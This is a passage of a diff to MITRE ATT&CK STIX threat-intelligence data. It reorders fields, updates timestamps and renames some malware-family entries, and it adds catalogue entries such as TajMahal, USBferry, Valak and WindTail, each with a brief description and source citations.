+ ],
+ "x_mitre_aliases": [
+ "TSCookie"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"id": "malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -200838,17 +230647,17 @@
],
"modified": "2020-03-30T18:20:01.325Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "TURNEDUP"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Christiaan Beek, @ChristiaanBeek",
"Ryan Becwar"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "TURNEDUP"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
@@ -200878,15 +230687,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T20:18:09.300Z",
+ "modified": "2020-06-23T20:40:40.755Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TYPEFRAME"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--b143dfa4-e944-43ff-8429-bfffc308c517",
@@ -200914,10 +230723,44 @@
],
"modified": "2020-03-30T18:21:09.468Z",
"created": "2017-05-31T21:32:14.900Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Taidoor"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0467",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0467"
+ },
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "TajMahal",
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)",
+ "id": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-15T21:19:30.717Z",
+ "created": "2020-06-08T14:57:32.842Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "TajMahal"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -200948,13 +230791,13 @@
],
"modified": "2020-03-30T18:21:44.275Z",
"created": "2017-05-31T21:32:12.310Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TinyZBot"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--00806466-754d-44ea-ad6f-0caf59cb8556",
@@ -201019,19 +230862,19 @@
],
"modified": "2020-03-30T21:08:00.221Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "TrickBot",
- "Totbrick",
- "TSPY_TRICKLOAD"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Omkar Gudhate",
"FS-ISAC"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "TrickBot",
+ "Totbrick",
+ "TSPY_TRICKLOAD"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d",
@@ -201059,13 +230902,13 @@
],
"modified": "2020-03-17T15:08:58.099Z",
"created": "2017-05-31T21:33:00.176Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Trojan.Karagany"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--c5e9cb46-aced-466c-85ea-7db5572ad9ec",
@@ -201093,13 +230936,13 @@
],
"modified": "2020-03-30T18:22:55.430Z",
"created": "2017-05-31T21:32:11.148Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Trojan.Mebromi"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--691c60e2-273d-4d56-9ce6-b67e0f8719ad",
@@ -201141,13 +230984,13 @@
],
"modified": "2020-03-18T16:10:02.987Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Truvasys"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c",
@@ -201179,13 +231022,13 @@
],
"modified": "2020-03-30T18:23:32.096Z",
"created": "2017-10-25T14:48:42.313Z",
- "x_mitre_aliases": [
- "Twitoor"
- ],
- "x_mitre_version": "1.3",
- "x_mitre_old_attack_id": "MOB-S0018",
"x_mitre_platforms": [
"Android"
+ ],
+ "x_mitre_old_attack_id": "MOB-S0018",
+ "x_mitre_version": "1.3",
+ "x_mitre_aliases": [
+ "Twitoor"
]
},
{
@@ -201218,13 +231061,13 @@
],
"modified": "2020-03-30T18:24:01.572Z",
"created": "2019-01-29T19:09:26.355Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"UBoatRAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa",
@@ -201260,14 +231103,14 @@
],
"modified": "2020-03-30T18:24:27.229Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"UPPERCUT",
"ANEL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--af2ad3b7-ab6a-4807-91fd-51bcaff9acbb",
@@ -201300,12 +231143,46 @@
],
"modified": "2020-03-18T16:11:07.955Z",
"created": "2017-05-31T21:33:17.716Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"USBStealer",
"USB Stealer",
"Win32/USBStealer"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0452",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0452"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "name": "USBferry",
+ "id": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T15:52:25.167Z",
+ "created": "2020-05-20T19:54:06.476Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "USBferry"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -201338,15 +231215,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-27T22:14:18.934Z",
+ "modified": "2020-07-01T18:32:47.285Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Umbreon"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--ab3580c8-8435-4117-aace-3d9fbe46aa56",
@@ -201374,13 +231251,13 @@
],
"modified": "2020-03-30T18:25:14.290Z",
"created": "2017-05-31T21:33:15.020Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Unknown Logger"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
@@ -201475,17 +231352,51 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:23:23.342Z",
+ "modified": "2020-06-24T13:57:16.815Z",
"created": "2019-06-04T18:42:22.552Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Ursnif",
"Gozi-ISFB",
"PE_URSNIF",
"Dreambot"
+ ],
+ "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0442",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0442"
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)",
+ "name": "VBShower",
+ "id": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-12T20:56:07.174Z",
+ "created": "2020-05-08T20:43:25.743Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "VBShower"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -201518,10 +231429,44 @@
],
"modified": "2020-03-30T18:26:04.840Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"VERMIN"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "name": "Valak",
+ "description": "[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0476",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0476"
+ },
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:11:42.794Z",
+ "created": "2020-06-19T17:11:54.854Z",
+ "x_mitre_aliases": [
+ "Valak"
+ ],
+ "x_mitre_version": "1.0",
"x_mitre_platforms": [
"Windows"
]
@@ -201561,15 +231506,21 @@
],
"modified": "2020-03-30T18:26:35.490Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Vasport"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2018-01-16T16:13:52.465Z",
+ "modified": "2020-03-25T13:57:35.783Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -201603,19 +231554,13 @@
"name": "Volgmer",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--495b6cdb-7b5a-4fbc-8d33-e7ef68806d08",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-25T13:57:35.783Z",
- "created": "2018-01-16T16:13:52.465Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Volgmer"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--1d808f62-cf63-4063-9727-ff6132514c22",
@@ -201652,13 +231597,13 @@
],
"modified": "2020-03-30T18:27:06.694Z",
"created": "2017-05-31T21:33:06.433Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"WEBC2"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
@@ -201778,9 +231723,9 @@
"source_name": "Washington Post WannaCry 2017"
},
{
- "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
+ "source_name": "FireEye WannaCry 2017",
"url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
- "source_name": "FireEye WannaCry 2017"
+ "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019."
},
{
"source_name": "SecureWorks WannaCry Analysis",
@@ -201792,12 +231737,11 @@
"labels": [
"malware"
],
- "modified": "2020-03-27T21:02:41.006Z",
+ "modified": "2020-05-13T22:59:51.283Z",
"created": "2019-03-25T17:30:17.004Z",
- "x_mitre_contributors": [
- "Jan Miller, CrowdStrike"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"WannaCry",
"WanaCry",
@@ -201805,8 +231749,9 @@
"WanaCrypt0r",
"WCry"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Jan Miller, CrowdStrike"
]
},
{
@@ -201844,13 +231789,13 @@
],
"modified": "2020-03-30T18:27:31.495Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Wiarp"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--22addc7b-b39f-483d-979a-1b35147da5de",
@@ -201878,12 +231823,56 @@
],
"modified": "2020-03-30T18:27:57.226Z",
"created": "2017-05-31T21:32:40.004Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"WinMM"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0466",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0466"
+ },
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "WindTail",
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "id": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-26T13:33:42.533Z",
+ "created": "2020-06-04T19:01:53.566Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "WindTail"
+ ],
"x_mitre_platforms": [
- "Windows"
+ "macOS"
]
},
{
@@ -201926,19 +231915,53 @@
],
"modified": "2020-03-30T18:29:08.243Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Wingbird"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "name": "Winnti for Linux",
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0430",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0430"
+ },
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-01T18:34:02.367Z",
+ "created": "2020-04-29T15:06:59.171Z",
"x_mitre_platforms": [
- "Windows"
- ]
+ "Linux"
+ ],
+ "x_mitre_aliases": [
+ "Winnti for Linux"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--d3afa961-a80c-4043-9509-282cdf69ab21",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Winnti",
- "description": "[Winnti](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015)",
+ "name": "Winnti for Windows",
+ "description": "[Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -201946,9 +231969,9 @@
"external_id": "S0141"
},
{
- "source_name": "Kaspersky Winnti April 2013",
+ "url": "https://securelist.com/winnti-more-than-just-a-game/37029/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.",
- "url": "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "source_name": "Kaspersky Winnti April 2013"
},
{
"url": "https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/",
@@ -201956,9 +231979,14 @@
"source_name": "Microsoft Winnti Jan 2017"
},
{
- "source_name": "Novetta Winnti April 2015",
+ "url": "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"description": "Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.",
- "url": "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf"
+ "source_name": "Novetta Winnti April 2015"
+ },
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
}
],
"object_marking_refs": [
@@ -201968,15 +231996,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-18T16:13:37.631Z",
+ "modified": "2020-05-04T12:29:49.081Z",
"created": "2017-05-31T21:33:21.027Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Winnti"
- ],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Winnti for Windows"
+ ],
+ "x_mitre_version": "2.0"
},
{
"id": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085",
@@ -202051,14 +232079,14 @@
],
"modified": "2020-03-30T18:30:21.733Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.3",
"x_mitre_aliases": [
"XAgentOSX",
"OSX.Sofacy"
],
- "x_mitre_version": "1.3"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--7343e208-7cab-45f2-a47b-41ba5e2f0fab",
@@ -202117,16 +232145,16 @@
],
"modified": "2020-03-21T00:40:57.275Z",
"created": "2017-05-31T21:33:09.453Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"XTunnel",
"Trojan.Shunnael",
"X-Tunnel",
"XAPS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"external_references": [
@@ -202140,9 +232168,9 @@
"description": "(Citation: Unit42 Xbash Sept 2018)"
},
{
- "source_name": "Unit42 Xbash Sept 2018",
+ "description": "Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/",
- "description": "Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018."
+ "source_name": "Unit42 Xbash Sept 2018"
}
],
"object_marking_refs": [
@@ -202156,16 +232184,16 @@
"labels": [
"malware"
],
- "modified": "2020-03-29T18:24:47.291Z",
+ "modified": "2020-06-23T20:41:28.496Z",
"created": "2019-01-30T13:28:47.452Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Xbash"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ]
},
{
"external_references": [
@@ -202175,33 +232203,33 @@
"url": "https://attack.mitre.org/software/S0388"
},
{
- "source_name": "TrendMicro TropicTrooper 2015",
+ "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
"url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
- "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
+ "source_name": "TrendMicro TropicTrooper 2015"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Yahoyah is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)",
- "name": "Yahoyah",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)",
+ "name": "YAHOYAH",
"id": "malware--cb444a16-3ea5-4a91-88c6-f329adcb8af3",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T18:30:56.253Z",
+ "modified": "2020-05-21T17:23:45.362Z",
"created": "2019-06-17T18:49:30.307Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_aliases": [
- "Yahoyah"
- ],
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Bart Parys"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "YAHOYAH"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -202230,13 +232258,13 @@
],
"modified": "2020-03-30T02:44:21.378Z",
"created": "2017-05-31T21:32:56.394Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ZLib"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--a4f57468-fbd5-49e4-8476-52088220b92d",
@@ -202292,17 +232320,17 @@
],
"modified": "2020-03-30T03:06:29.968Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "2.1",
- "x_mitre_aliases": [
- "Zebrocy",
- "Zekapab"
+ "x_mitre_contributors": [
+ "Emily Ratliff, IBM"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Emily Ratliff, IBM"
- ]
+ "x_mitre_aliases": [
+ "Zebrocy",
+ "Zekapab"
+ ],
+ "x_mitre_version": "2.1"
},
{
"id": "malware--4ab44516-ad75-4e43-a280-705dc0420e2f",
@@ -202339,13 +232367,13 @@
],
"modified": "2020-03-30T18:31:33.197Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ZeroT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--552462b9-ae79-49dd-855c-5973014e157f",
@@ -202417,13 +232445,13 @@
],
"modified": "2020-03-30T18:32:20.484Z",
"created": "2019-01-29T17:59:43.600Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Zeus Panda"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--cfc75b0d-e579-40ae-ad07-a1ce00d49a6c",
@@ -202464,13 +232492,13 @@
],
"modified": "2020-03-30T18:32:58.702Z",
"created": "2019-09-24T12:59:57.991Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"ZxShell",
"Sensocode"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -202503,17 +232531,85 @@
],
"modified": "2020-03-30T18:33:31.623Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "adbupd"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ryan Becwar"
],
+ "x_mitre_aliases": [
+ "adbupd"
+ ],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0471",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0471"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
